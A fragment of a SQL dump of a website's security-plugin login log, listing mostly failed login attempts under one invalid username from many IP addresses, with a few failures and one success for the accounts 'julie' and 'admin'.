(103887, 1500095941.978886, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835573799, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103888, 1500097075.895449, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1088887350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103889, 1500097077.304861, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1088887350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103890, 1500099925.360026, 1, 'loginFailValidUsername', 'julie', 2, 873965049, ''),
(103891, 1500100688.885545, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 780580991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103892, 1500100690.234245, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 780580991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103893, 1500101032.043736, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2036559243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103894, 1500101034.876032, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2036559243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103895, 1500101309.003343, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2982752697, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103896, 1500101310.468264, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2982752697, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103897, 1500106175.543879, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976044991, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103898, 1500106398.508892, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1297608708, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103899, 1500108795.336120, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2868764100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103900, 1500108796.532931, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2868764100, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103901, 1500109862.683272, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1571919792, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103902, 1500109863.903920, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1571919792, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103903, 1500110263.072129, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1051243338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103904, 1500110264.126579, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1051243338, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103905, 1500112968.732547, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/534.04.51 (KHTML, like Gecko) Chrome/57.4.9288.4016 Safari/534.34'),
(103906, 1500113422.661445, 1, 'loginFailValidUsername', 'julie', 2, 874893407, ''),
(103907, 1500116185.106257, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1490298005, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103908, 1500116186.498594, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1490298005, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103909, 1500116322.444641, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1415292827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103910, 1500116323.538698, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1415292827, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103911, 1500116450.637608, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 979684014, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103912, 1500116452.417734, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 979684014, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103913, 1500117519.333100, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1014463215, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103914, 1500117520.723017, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1014463215, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103915, 1500117598.093221, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1498204623, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103916, 1500117599.068753, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1498204623, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103917, 1500120564.020069, 1, 'loginFailInvalidUsername', 'test', 0, 1549060274, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103918, 1500120565.634492, 1, 'loginFailInvalidUsername', 'test', 0, 1549060274, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103919, 1500122101.820133, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 5.2) AppleWebKit/532.97.40 (KHTML, like Gecko) Chrome/57.5.0916.5289 Safari/534.68 OPR/40.6.1739.6001'),
(103920, 1500125299.193256, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2946419000, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103921, 1500125300.987825, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2946419000, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103922, 1500126459.018772, 1, 'loginFailValidUsername', 'julie', 2, 874893407, ''),
(103923, 1500126598.100066, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2631171529, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103924, 1500126599.325959, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2631171529, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103925, 1500126691.250475, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1523870519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103926, 1500126692.380102, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1523870519, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103927, 1500128564.455619, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1342974510, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103928, 1500128565.546818, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1342974510, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103929, 1500128873.766067, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1336393587, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103930, 1500128874.797578, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1336393587, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103931, 1500129319.351097, 1, 'loginFailValidUsername', 'admin', 1, 3526612805, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(103932, 1500129400.487867, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3399919026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103933, 1500129401.718138, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3399919026, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103934, 1500130054.315140, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1604693571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103935, 1500130055.347418, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1604693571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103936, 1500131718.339090, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2374503378, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103937, 1500131719.823474, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2374503378, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103938, 1500132537.932821, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3013207725, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103939, 1500132539.351440, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3013207725, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103940, 1500133388.506148, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 779452982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103941, 1500133389.579675, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 779452982, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103942, 1500135872.677504, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2991933812, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103943, 1500135873.635865, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2991933812, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103944, 1500138276.636488, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3318663778, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103945, 1500138277.714137, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3318663778, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103946, 1500139102.892760, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1781789324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103947, 1500139104.090382, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1781789324, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103948, 1500139262.370981, 1, 'loginFailValidUsername', 'julie', 2, 583622267, ''),
(103949, 1500139376.709619, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657224322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103950, 1500139378.022341, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657224322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103951, 1500141267.615833, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976112628, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103952, 1500141269.573778, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976112628, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103953, 1500148559.033181, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549272919, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103954, 1500148559.966116, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549272919, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103955, 1500152033.128133, 1, 'loginFailValidUsername', 'julie', 2, 585291184, ''),
(103956, 1500152099.120061, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2332422595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103957, 1500152100.453065, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2332422595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103958, 1500155684.035939, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3583325039, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(103959, 1500155685.015337, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3583325039, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103960, 1500156831.897880, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2588110632, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103961, 1500156833.557576, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2588110632, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103962, 1500160451.810948, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3319954936, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103963, 1500162630.737601, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2050341734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103964, 1500162632.671532, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2050341734, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103965, 1500163898.429086, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 6.2; WOW64; x64) AppleWebKit/531.84.37 (KHTML, like Gecko) Chrome/56.3.9658.4820 Safari/534.44 OPR/44.5.0371.5643'),
(103966, 1500164749.416714, 1, 'loginFailValidUsername', 'julie', 2, 911901410, ''),
(103967, 1500169905.168435, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3042655538, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103968, 1500172135.996149, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2982214495, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103969, 1500172137.896213, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2982214495, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103970, 1500178801.069251, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3361094801, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103971, 1500178945.387394, 1, 'loginFailValidUsername', 'julie', 2, 919161641, ''),
(103972, 1500181716.193208, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1678835878, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103973, 1500185547.203253, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1744517895, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103974, 1500186715.732462, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1729003577, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103975, 1500186718.451057, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1729003577, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103976, 1500187179.472530, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2315261990, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103977, 1500187181.368764, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2315261990, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103978, 1500188687.211665, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1034942322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103979, 1500188694.698008, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1034942322, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103980, 1500188764.069600, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 984866374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103981, 1500188765.917135, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 984866374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103982, 1500190406.672923, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1743437059, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103983, 1500190412.138099, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1743437059, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103984, 1500190916.134994, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1384349292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103985, 1500190917.260868, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1384349292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103986, 1500191396.971041, 1, 'loginFailValidUsername', 'julie', 2, 585452219, ''),
(103987, 1500191771.619910, 0, 'loginOK', 'admin', 1, 1055643623, 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),
(103988, 1500193614.146648, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2003317331, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103989, 1500193615.677783, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2003317331, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103990, 1500193622.649635, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 996543394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103991, 1500193624.323538, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 996543394, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103992, 1500194737.638314, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3142477053, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103993, 1500194739.030226, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3142477053, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103994, 1500198415.044433, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694932233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103995, 1500198416.086320, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 694932233, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103996, 1500199810.621905, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.91.48 (KHTML, like Gecko) Version/5.3.8 Safari/531.83'),
(103997, 1500201345.331940, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3584181319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103998, 1500201346.463857, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3584181319, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103999, 1500201479.880134, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1959709504, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104000, 1500201481.191712, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1959709504, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104001, 1500201483.773891, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 36836099, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104002, 1500201484.970189, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 36836099, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104003, 1500202626.470749, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 773628453, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104004, 1500202627.549179, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 773628453, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104005, 1500202927.335076, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3039364422, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104006, 1500202928.633160, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3039364422, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104007, 1500203411.808693, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1517002773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104008, 1500203412.714421, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1517002773, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104009, 1500204825.940172, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2015196442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104010, 1500204827.473511, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2015196442, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104011, 1500205557.827509, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835616125, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104012, 1500205559.094682, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835616125, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104013, 1500205955.644608, 1, 'loginFailValidUsername', 'julie', 2, 585452219, ''),
(104014, 1500207963.394842, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887846670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104015, 1500207964.705086, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1887846670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104016, 1500208284.073077, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3547897544, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104017, 1500208285.866019, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3547897544, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104018, 1500208772.728638, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3129679397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104019, 1500208774.164454, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3129679397, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104020, 1500209697.614346, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1364910579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104021, 1500209699.236077, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1364910579, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104022, 1500212468.351752, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1550988330, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104023, 1500212470.443084, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1550988330, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104024, 1500212811.692938, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1436185340, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104025, 1500212812.904317, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1436185340, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104026, 1500213888.908367, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976909362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104027, 1500213890.682758, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1976909362, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104028, 1500214588.959447, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3398302038, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104029, 1500214590.336552, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3398302038, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(104030, 1500214765.310816, 1, 'loginFailValidUsername', 'admin', 1, 3526612805, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(104031, 1500215770.996268, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1728410209, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
